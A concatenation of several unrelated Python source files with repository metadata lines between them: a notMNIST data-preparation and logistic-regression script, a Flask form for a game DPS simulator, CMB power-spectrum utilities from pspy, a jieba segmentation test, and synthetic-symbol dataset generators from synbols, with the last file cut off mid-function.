print('%s already present - Skipping extraction of %s.' % (root, filename))
else:
print('Extracting data for %s. This may take a while. Please wait.' % root)
tar = tarfile.open(filename)
sys.stdout.flush()
tar.extractall()
tar.close()
data_folders = [
os.path.join(root, d) for d in sorted(os.listdir(root))
if os.path.isdir(os.path.join(root, d))]
if len(data_folders) != num_classes:
raise Exception(
'Expected %d folders, one per class. Found %d instead.' % (
num_classes, len(data_folders)))
print(data_folders)
return data_folders
train_folders = maybe_extract(train_filename)
test_folders = maybe_extract(test_filename)
#IPython.display.display_png('notMNIST_large/B/MDEtMDEtMDAudHRm.png')
#IPython.display.display_png('notMNIST_large/J/Nng3b2N0IEFsdGVybmF0ZSBSZWd1bGFyLnR0Zg==.png')
image_size = 28 # Pixel width and height.
pixel_depth = 255.0 # Number of levels per pixel.
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), image_size, image_size),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (ndimage.imread(image_file).astype(float) -
pixel_depth / 2) / pixel_depth
if image_data.shape != (image_size, image_size):
raise Exception('Unexpected image shape: %s' % str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except IOError as e:
print('Could not read:', image_file, ':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
def maybe_pickle(data_folders, min_num_images_per_class, force=False):
dataset_names = []
for folder in data_folders:
set_filename = folder + '.pickle'
dataset_names.append(set_filename)
if os.path.exists(set_filename) and not force:
# You may override by setting force=True.
print('%s already present - Skipping pickling.' % set_filename)
else:
print('Pickling %s.' % set_filename)
dataset = load_letter(folder, min_num_images_per_class)
try:
with open(set_filename, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
except Exception as e:
print('Unable to save data to', set_filename, ':', e)
return dataset_names
train_datasets = maybe_pickle(train_folders, 45000)
test_datasets = maybe_pickle(test_folders, 1800)
def load_dataset(filename):
with open(filename, 'rb') as f:
return pickle.load(f)
# Display a random matrix with a specified figure number and a grayscale colormap
# largeNameA = train_datasets[0]
# print(largeNameA)
# largeDataA = load_dataset(largeNameA)
# img1 = largeDataA[0, :, :]
# plt.matshow(img1, cmap=plt.cm.gray)
# plt.show()
#
# smallNameJ = test_datasets[9]
# print(smallNameJ)
# smallDataJ = load_dataset(smallNameJ)
# img2 = smallDataJ[0, :, :]
# plt.matshow(img2, cmap=plt.cm.gray)
# plt.show()
# Check whether the data is balanced between classes
# for name in train_datasets:
# dataset = load_dataset(name)
# print(name, ' size:', dataset.shape)
#
# for name in test_datasets:
# dataset = load_dataset(name)
# print(name, ' size:', dataset.shape)
def make_arrays(nb_rows, img_size):
if nb_rows:
dataset = np.ndarray((nb_rows, img_size, img_size), dtype=np.float32)
labels = np.ndarray(nb_rows, dtype=np.int32)
else:
dataset, labels = None, None
return dataset, labels
def merge_datasets(pickle_files, train_size, valid_size=0):
num_classes = len(pickle_files)
valid_dataset, valid_labels = make_arrays(valid_size, image_size)
train_dataset, train_labels = make_arrays(train_size, image_size)
vsize_per_class = valid_size // num_classes
tsize_per_class = train_size // num_classes
start_v, start_t = 0, 0
end_v, end_t = vsize_per_class, tsize_per_class
end_l = vsize_per_class + tsize_per_class
for label, pickle_file in enumerate(pickle_files):
try:
with open(pickle_file, 'rb') as f:
letter_set = pickle.load(f)
# let's shuffle the letters to have random validation and training set
np.random.shuffle(letter_set)
if valid_dataset is not None:
valid_letter = letter_set[:vsize_per_class, :, :]
valid_dataset[start_v:end_v, :, :] = valid_letter
valid_labels[start_v:end_v] = label
start_v += vsize_per_class
end_v += vsize_per_class
train_letter = letter_set[vsize_per_class:end_l, :, :]
train_dataset[start_t:end_t, :, :] = train_letter
train_labels[start_t:end_t] = label
start_t += tsize_per_class
end_t += tsize_per_class
except Exception as e:
print('Unable to process data from', pickle_file, ':', e)
raise
return valid_dataset, valid_labels, train_dataset, train_labels
# def show_images(dataset, labels, count):
# for i in range(0,count):
# print(labels[i])
# plt.matshow(dataset[i,:,:], cmap=plt.cm.gray)
# plt.show()
# show_images(train_dataset, train_labels, 3)
# show_images(test_dataset, test_labels, 3)
# show_images(valid_dataset, valid_labels, 3)
pickle_file = 'notMNIST.pickle'
if not os.path.exists(pickle_file):
train_size = 200000
valid_size = 10000
test_size = 10000
valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(
train_datasets, train_size, valid_size)
_, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)
indices = np.arange(train_dataset.shape[0])
np.random.shuffle(indices)
train_dataset = train_dataset[indices]
train_labels = train_labels[indices]
try:
f = open(pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': valid_dataset,
'valid_labels': valid_labels,
'test_dataset': test_dataset,
'test_labels': test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
def load_datasets(pickle_file):
statinfo = os.stat(pickle_file)
print('Compressed pickle size:', statinfo.st_size)
f = open(pickle_file, 'rb')
save = pickle.load(f)
f.close()
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
return train_dataset, train_labels, valid_dataset, valid_labels, test_dataset, test_labels
train_dataset, train_labels, valid_dataset, valid_labels, test_dataset, test_labels = load_datasets(pickle_file)
print('Training:', train_dataset.shape, train_labels.shape)
print('Validation:', valid_dataset.shape, valid_labels.shape)
print('Testing:', test_dataset.shape, test_labels.shape)
def sanitize_dataset(dataset, labels, filter_dataset, similarity_epsilon):
similarity = cosine_similarity(np.reshape(dataset, (dataset.shape[0],-1)), np.reshape(filter_dataset, (filter_dataset.shape[0],-1)))
same_filter = np.sum(similarity == 1, axis=1) > 0
similar_filter = np.sum(similarity > 1-similarity_epsilon, axis=1) > 0
same_count = np.sum(same_filter)
similar_count = np.sum(similar_filter)
filtered_dataset = dataset[same_filter==False]
filtered_labels = labels[same_filter==False]
return filtered_dataset, filtered_labels, same_count, similar_count
sanit_pickle_file = 'notMNIST_sanit.pickle'
if not os.path.exists(sanit_pickle_file):
filtered_valid_dataset, filtered_valid_labels, train_valid_same, train_valid_similar = \
sanitize_dataset(valid_dataset, valid_labels, train_dataset, 0.001)
print("training-validation: same=", train_valid_same, "similar=", train_valid_similar)
filtered_test_dataset, filtered_test_labels, train_test_same, train_test_similar = \
sanitize_dataset(test_dataset, test_labels, train_dataset, 0.001)
print("training-testing: same=", train_test_same, "similar=", train_test_similar)
filtered_test_dataset, filtered_test_labels, valid_test_same, valid_test_similar = \
sanitize_dataset(filtered_test_dataset, filtered_test_labels, filtered_valid_dataset, 0.001)
print("validation-testing: same=", valid_test_same, "similar=", valid_test_similar)
try:
f = open(sanit_pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': filtered_valid_dataset,
'valid_labels': filtered_valid_labels,
'test_dataset': filtered_test_dataset,
'test_labels': filtered_test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
train_dataset, train_labels, filtered_valid_dataset, filtered_valid_labels, filtered_test_dataset, filtered_test_labels = load_datasets(sanit_pickle_file)
print('Training (sanitized):', train_dataset.shape, train_labels.shape)
print('Validation (sanitized):', filtered_valid_dataset.shape, filtered_valid_labels.shape)
print('Testing (sanitized):', filtered_test_dataset.shape, filtered_test_labels.shape)
def train_model(dataset, labels, size=None):
maxSize = dataset.shape[0]
if size is None:
size = maxSize
elif size > maxSize:
size = maxSize
else:
dataset = dataset[0:size]
labels = labels[0:size]
X = np.reshape(dataset, (size,-1))
y = labels
lr = LogisticRegression(n_jobs=4)
lr.fit(X, y)
return lr
def model_score(model, dataset, labels):
X = np.reshape(dataset, (dataset.shape[0],-1))
y = labels
return model.score(X, y)
def train(size=None):
if size is None:
print("Training with all examples:")
else:
print("Training with ", size, " examples:")
model = train_model(train_dataset, train_labels, size)
print(" validation score: ", model_score(model, valid_dataset, valid_labels))
print(" test score: ", model_score(model, test_dataset, test_labels))
print(" validation score (sanitized): ", model_score(model, filtered_valid_dataset, filtered_valid_labels))
print(" test score (sanitized): ", model_score(model, filtered_test_dataset, filtered_test_labels))
for size in [50, 100, 1000, 5000]:
train(size)
# training on all examples:
#train()
| 1.914063 | 2 |
app/form.py | CalebF98/tbcc-moonkin-dps-simulator | 0 | 12797368 | from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField
from wtforms.fields.simple import SubmitField
from wtforms.validators import DataRequired, NumberRange
class SimParamsForm(FlaskForm):
intellect = IntegerField('Intellect', [NumberRange(0,1000)])
spellpower = IntegerField('Spellpower', [NumberRange(0,1000)])
hit_score = IntegerField('Spell Hit Rating', [NumberRange(0,202)])
crit_score = IntegerField('Spell Crit Rating', [NumberRange(0,500)])
haste_score = IntegerField('Spell Haste Rating', [NumberRange(0,1000)])
num_fights = IntegerField('# of fights to simulate', [NumberRange(1,2500)]) | 1.195313 | 1 |
pspy/pspy_utils.py | xgarrido/pspy | 6 | 12797376 | <reponame>xgarrido/pspy
"""
Utils for pspy.
"""
import os
import numpy as np
def ps_lensed_theory_to_dict(filename, output_type, lmax=None, start_at_zero=False):
"""Read a lensed power spectrum from CAMB and return a dictionnary
Parameters
----------
filename : string
the name of the CAMB lensed power spectrum you want to read
lmax : integer
the maximum multipole (spectra will be cut at)
output_type : string
'Cl' or 'Dl'
start_at_zero : boolean
if True, ps start at l=0 and cl(l=0) and cl(l=1) are set to 0
"""
fields = ["TT", "TE", "TB", "ET", "BT", "EE", "EB", "BE", "BB"]
ps = {}
l, ps["TT"], ps["EE"], ps["BB"], ps["TE"] = np.loadtxt(filename, unpack=True)
ps["ET"] = ps["TE"].copy()
ps["TB"], ps["BT"], ps["EB"], ps["BE"] = np.zeros((4, len(l)))
if lmax is not None:
l = l[:lmax]
scale = l * (l + 1) / (2 * np.pi)
for f in fields:
if lmax is not None:
ps[f] = ps[f][:lmax]
if output_type == "Cl":
ps[f] /= scale
if start_at_zero:
ps[f] = np.append(np.array([0, 0]), ps[f])
if start_at_zero:
l = np.append(np.array([0, 1]), l)
return l, ps
def ps_from_params(cosmo_params, output_type, lmax, start_at_zero=False):
"""Given a set of cosmological parameters compute the corresponding lensed power spectrum
You need to have camb installed to use this function
----------
cosmo_params: dict
dictionnary of cosmological parameters
# e.g cosmo_params = {"cosmomc_theta":0.0104085, "logA": 3.044, "ombh2": 0.02237, "omch2": 0.1200, "ns": 0.9649, "Alens": 1.0, "tau": 0.0544}
output_type : string
'Cl' or 'Dl'
lmax: integer
the maximum multipole to consider
start_at_zero : boolean
if True, ps start at l=0 and cl(l=0) and cl(l=1) are set to 0
else, start at l=2
"""
try:
import camb
except ModuleNotFoundError:
raise ModuleNotFoundError("you need to install camb to use this function")
if start_at_zero:
lmin = 0
else:
lmin = 2
camb_cosmo = {k: v for k, v in cosmo_params.items() if k not in ["logA", "As"]}
camb_cosmo.update({"As": 1e-10*np.exp(cosmo_params["logA"]), "lmax": lmax, "lens_potential_accuracy": 1})
pars = camb.set_params(**camb_cosmo)
results = camb.get_results(pars)
powers = results.get_cmb_power_spectra(pars, CMB_unit="muK")
l = np.arange(lmin, lmax)
ps = {spec: powers["total"][l][:, count] for count, spec in enumerate(["TT", "EE", "BB", "TE" ])}
ps["ET"] = ps["TE"]
for spec in ["TB", "BT", "EB", "BE" ]:
ps[spec] = ps["TT"] * 0
scale = l * (l + 1) / (2 * np.pi)
if output_type == "Cl":
if start_at_zero:
ps[2:] /= scale[2:]
else:
ps[:] /= scale[:]
return l, ps
def get_nlth_dict(rms_uKarcmin_T, type, lmax, spectra=None, rms_uKarcmin_pol=None, beamfile=None):
"""Return the effective noise power spectrum Nl/bl^2 given a beam file and a noise rms
Parameters
----------
rms_uKarcmin_T: float
the temperature noise rms in uK.arcmin
type: string
'Cl' or 'Dl'
lmax: integer
the maximum multipole to consider
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
rms_uKarcmin_pol: float
the polarisation noise rms in uK.arcmin
beamfile: string
the name of the beam transfer function (assuming it's given as a two column file l,bl)
"""
if beamfile is not None:
l, bl = np.loadtxt(beamfile, unpack=True)
else:
bl = np.ones(lmax + 2)
lth = np.arange(2, lmax + 2)
nl_th = {}
if spectra is None:
nl_th["TT"] = (
np.ones(lmax) * (rms_uKarcmin_T * np.pi / (60 * 180)) ** 2 / bl[2 : lmax + 2] ** 2
)
if type == "Dl":
nl_th["TT"] *= lth * (lth + 1) / (2 * np.pi)
return nl_th
else:
if rms_uKarcmin_pol is None:
rms_uKarcmin_pol = rms_uKarcmin_T * np.sqrt(2)
for spec in spectra:
nl_th[spec] = np.zeros(lmax)
nl_th["TT"] = np.ones(lmax) * (rms_uKarcmin_T * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
nl_th["EE"] = np.ones(lmax) * (rms_uKarcmin_pol * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
nl_th["BB"] = np.ones(lmax) * (rms_uKarcmin_pol * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
if type == "Dl":
for spec in spectra:
nl_th[spec] *= lth * (lth + 1) / (2 * np.pi)
return nl_th
def read_beam_file(beamfile, lmax=None):
"""Read beam file with formal, l, bl, stuff and normalize it
Parameters
__________
beamfile: string
the name of the beam file
lmax: integer
the maximum multipole to consider
"""
beam = np.loadtxt(beamfile)
l, bl = beam[:, 0], beam[:, 1]
if lmax is not None:
l, bl = l[:lmax], bl[:lmax]
return l, bl / bl[0]
def create_binning_file(bin_size, n_bins, lmax=None, file_name=None):
"""Create a (constant) binning file, and optionnaly write it to disk
Parameters
----------
bin_size: float
the size of the bins
n_bins: integer
the number of bins
lmax: integer
the maximum multipole to consider
file_name: string
the name of the binning file
"""
bins = np.arange(n_bins)
bin_low = bins * bin_size + 2
bin_hi = (bins + 1) * bin_size + 1
bin_cent = (bin_low + bin_hi) / 2
if lmax is not None:
id = np.where(bin_hi < lmax)
bin_low, bin_hi, bin_cent = bin_low[id], bin_hi[id], bin_cent[id]
if file_name is None:
return bin_low, bin_hi, bin_cent
else:
f = open("%s" % file_name, mode="w")
for i in range(len(bin_low)):
f.write("%0.2f %0.2f %0.2f\n" % (bin_low[i], bin_hi[i], bin_cent[i]))
f.close()
def read_binning_file(file_name, lmax):
"""Read a binningFile and truncate it to lmax, if bin_low lower than 2, set it to 2.
format is bin_low, bin_high, bin_mean
Parameters
----------
binningfile: string
the name of the binning file
lmax: integer
the maximum multipole to consider
"""
bin_low, bin_hi, bin_cent = np.loadtxt(file_name, unpack=True)
id = np.where(bin_hi < lmax)
bin_low, bin_hi, bin_cent = bin_low[id], bin_hi[id], bin_cent[id]
if bin_low[0] < 2:
bin_low[0] = 2
bin_hi = bin_hi.astype(int)
bin_low = bin_low.astype(int)
bin_size = bin_hi - bin_low + 1
return bin_low, bin_hi, bin_cent, bin_size
def create_directory(name):
"""Create a directory
Parameters
----------
name: string
the name of the directory
"""
os.makedirs(name, exist_ok=True)
def naive_binning(l, fl, binning_file, lmax):
"""Bin a function of l given a binning file and lmax
Parameters
----------
l: 1d integer array
the multipoles
fl: 1d float array
the 1-dimensional function to bin
binning_file: string
the name of the binning file
lmax: integer
the maximum multipole to consider
"""
bin_low, bin_hi, bin_cent, bin_size = read_binning_file(binning_file, lmax)
n_bins = len(bin_hi)
fl_bin = np.zeros(len(bin_cent))
for ibin in range(n_bins):
loc = np.where((l >= bin_low[ibin]) & (l <= bin_hi[ibin]))
fl_bin[ibin] = (fl[loc]).mean()
return bin_cent, fl_bin
def beam_from_fwhm(fwhm_arcminute, lmax):
"""Compute the harmonic transform of the beam
given the beam full width half maximum in arcminute
Parameters
----------
fwhm_arcminute: float
full width half maximum in arcminute
lmax: integer
the maximum multipole to consider
"""
beam_fwhm_rad = np.deg2rad(fwhm_arcminute) / 60
fac = beam_fwhm_rad / np.sqrt(8 * np.log(2))
ell = np.arange(2, lmax)
bl = np.exp(-ell * (ell + 1) * fac ** 2 / 2.0)
return ell, bl
| 1.695313 | 2 |
self/test/preprocess_test.py | luweishuang/rasa | 0 | 12797384 | <gh_stars>0
# -*- coding: utf-8 -*-
import jieba
jieba.load_userdict("user_dict.txt")
line_list = ["查询安顺站一号风机的电压曲线",
"查询安各庄1母线的故障信息",
"开始进行南京站设备状态核实",
"看下安顺站3月1号的静态功率曲线"]
for cur_line in line_list:
seg_list = jieba.cut(cur_line.strip())
print("jieba rst: " + "/ ".join(seg_list))
| 1.476563 | 1 |
synbols/predefined_datasets.py | shikhar-srivastava/synbols | 0 | 12797392 | import logging
import numpy as np
import math
from .drawing import Camouflage, NoPattern, SolidColor, MultiGradient, ImagePattern, Gradient, Image, Symbol
from .fonts import LANGUAGE_MAP
from .generate import (
dataset_generator,
basic_attribute_sampler,
flatten_mask,
flatten_mask_except_first,
add_occlusion,
rand_seed,
)
def generate_i(n_samples, alphabet = None, language="english", font = 'calibri', set = "plain", seed=None, **kwargs):
"""[summary]
Args:
n_samples ([type]): [description]
language (str, optional): [description]. Defaults to "english".
seed ([type], optional): [description]. Defaults to None.
"""
if alphabet is None:
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
print(alphabet)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
rotation = 0
translation = (0.0,0.0)
if set == 'rotation':
rotation = (lambda rng: rng.uniform(low=0, high=1)*math.pi)
elif set == 'translation':
translation= (lambda rng: tuple(rng.uniform(low=-1, high=1, size=2)))
elif set == 'gradient':
fg = None
bg = None
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
font = font,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=rotation,
scale=0.7,
translation=translation,
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset_alphabet_onlygrad(n_samples, chars, seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP['english'].get_alphabet(support_bold=False)
#print(alphabet.fonts[:10])
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
char=lambda rng: rng.choice(chars),
font=lambda rng: rng.choice(alphabet.fonts[50:55]),
is_slant=False,
is_bold=False,
rotation=0,
scale=0.7,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset_alphabet(n_samples, chars, seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP['english'].get_alphabet(support_bold=False)
#print(alphabet.fonts[:10])
fg = [SolidColor((1, 1, 1)), ImagePattern(seed=123)]
bg = [SolidColor((0, 0, 0)), ImagePattern(seed=123)]
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
char=lambda rng: rng.choice(chars),
font=lambda rng: rng.choice(alphabet.fonts[50:55]),
is_slant=False,
is_bold=False,
background= lambda rng:rng.choice(bg),
foreground= lambda rng:rng.choice(fg),
rotation=0,
scale=0.7,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset(n_samples, language="english", seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=0,
scale=0.7,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_rotated_dataset(n_samples, language="english", seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=lambda rng: rng.uniform(low=0, high=1)*math.pi,
scale=1.0,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_translated_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate default with translation uniformly b/w (-1,1)
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=0,
scale=1.0,
translation=lambda rng: tuple(rng.uniform(low=-1, high=1, size=2)),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_scaled_dataset(n_samples, language="english", seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=0,
scale=None,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_bold_dataset(n_samples, language="english", seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=True)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=True,
background=bg,
foreground=fg,
rotation=0,
scale=1.0,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_italic_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate white on black, centered symbols.
The only factors of variations are font and char.
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=True,
is_bold=False,
background=bg,
foreground=fg,
rotation=0,
scale=1.0,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_gradient_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate white on black, centered symbols.
The only factors of variations are font and char.
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
rotation=0,
scale=1.0,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_natural_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate white on black, centered symbols.
The only factors of variations are font and char.
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
background=lambda rng: ImagePattern(seed=rand_seed(rng)), #lambda rng: Gradient(seed=rand_seed(_rng))
foreground=lambda rng: ImagePattern(seed=rand_seed(rng)),
is_slant=False,
is_bold=False,
rotation=0,
scale=1.0,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_camouflage_dataset(n_samples, language="english", seed=None, **kwargs):
"""
"""
alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
angle = 0
fg = Camouflage(stroke_angle=angle, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
bg = Camouflage(stroke_angle=angle + np.pi / 2, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
scale = 0.7 * np.exp(np.random.randn() * 0.1)
attr_sampler = basic_attribute_sampler(
alphabet=alphabet,
is_slant=False,
is_bold=False,
background=bg,
foreground=fg,
rotation=0,
scale=scale,
translation=(0.0, 0.0),
inverse_color=False,
pixel_noise_scale=0.0,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_tiny_dataset(n_samples, language="english", seed=None, **kwarg):
"""Generate a dataset of 8x8 resolution in gray scale
with scale of 1 and minimal variations.
"""
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
background=bg,
foreground=fg,
is_bold=False,
is_slant=False,
scale=1,
resolution=(8, 8),
is_gray=True,
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_default_dataset(n_samples, language="english", seed=None, **kwarg):
"""Generate the default dataset,
using gradiant as foreground and background.
"""
attr_sampler = basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet())
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_solid_bg_dataset(n_samples, language="english", seed=None, **kwarg):
"""Same as default datasets, but uses white on black."""
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
attr_sampler = basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet(), background=bg, foreground=fg)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_natural_images_dataset(n_samples, language="english", seed=None, **kwargs):
"""Same as default dataset, but uses natural images as foreground and background."""
attr_sampler = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(),
background=lambda rng: ImagePattern(seed=rand_seed(rng)),
foreground=lambda rng: ImagePattern(seed=rand_seed(rng)),
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_korean_1k_dataset(n_samples, seed=None, **kwarg):
"""Uses the first 1000 korean symbols"""
alphabet = LANGUAGE_MAP["korean"].get_alphabet(support_bold=True)
chars = alphabet.symbols[:1000]
fonts = alphabet.fonts
attr_sampler = basic_attribute_sampler(char=lambda rng: rng.choice(chars), font=lambda rng: rng.choice(fonts))
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_camouflage_dataset(n_samples, language="english", texture="camouflage", seed=None, **kwarg):
"""Generate a dataset where the pixel distribution
is the same for the foreground and background.
"""
def attr_sampler(seed=None):
if texture == "camouflage":
angle = 0
fg = Camouflage(stroke_angle=angle, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
bg = Camouflage(stroke_angle=angle + np.pi / 2, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
elif texture == "shade":
fg, bg = None, None
elif texture == "bw":
fg = SolidColor((1, 1, 1))
bg = SolidColor((0, 0, 0))
else:
raise ValueError("Unknown texture %s." % texture)
scale = 0.7 * np.exp(np.random.randn() * 0.1)
return basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=True),
background=bg,
foreground=fg,
is_bold=True,
is_slant=False,
scale=scale,
)(seed)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_non_camou_bw_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate a black and white dataset with
the same attribute distribution as the camouflage dataset.
"""
return generate_camouflage_dataset(n_samples, language=language, texture="bw", seed=seed, **kwargs)
def generate_non_camou_shade_dataset(n_samples, language="english", seed=None, **kwargs):
"""Generate a gradient foreground and background dataset
with same attribute distribution as the camouflage dataset.
"""
return generate_camouflage_dataset(n_samples, language=language, texture="shade", seed=seed, **kwargs)
# for segmentation, detection, counting
# -------------------------------------
def generate_segmentation_dataset(n_samples, language="english", resolution=(128, 128), seed=None, **kwarg):
"""Generate 3-10 symbols of various scale
and rotation and translation (no bold).
"""
def scale(rng):
return 0.1 * np.exp(rng.randn() * 0.4)
def n_symbols(rng):
return rng.choice(list(range(3, 10)))
attr_generator = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
resolution=resolution,
scale=scale,
is_bold=False,
n_symbols=n_symbols,
)
return dataset_generator(attr_generator, n_samples, flatten_mask, dataset_seed=seed)
def generate_counting_dataset(
n_samples, language="english", resolution=(128, 128), n_symbols=None, scale_variation=0.5, seed=None, **kwarg
):
"""Generate 3-10 symbols at various scale.
Samples 'a' with prob 70% or a latin lowercase otherwise.
"""
if n_symbols is None:
def n_symbols(rng):
return rng.choice(list(range(3, 10)))
def scale(rng):
return 0.1 * np.exp(rng.randn() * scale_variation)
def char_sampler(rng):
if rng.rand() < 0.3:
return rng.choice(LANGUAGE_MAP[language].get_alphabet(support_bold=False).symbols)
else:
return "a"
attr_generator = basic_attribute_sampler(
char=char_sampler, resolution=resolution, scale=scale, is_bold=False, n_symbols=n_symbols
)
return dataset_generator(attr_generator, n_samples, flatten_mask, dataset_seed=seed)
def generate_counting_dataset_scale_fix(n_samples, seed=None, **kwargs):
"""Generate 3-10 symbols at fixed scale.
Samples 'a' with prob 70% or a latin lowercase otherwise.
"""
return generate_counting_dataset(n_samples, scale_variation=0, seed=seed, **kwargs)
def generate_counting_dataset_crowded(n_samples, seed=None, **kwargs):
"""Generate 30-50 symbols at fixed scale.
Samples 'a' with prob 70% or a latin lowercase otherwise.
"""
def n_symbols(rng):
return rng.choice(list(range(30, 50)))
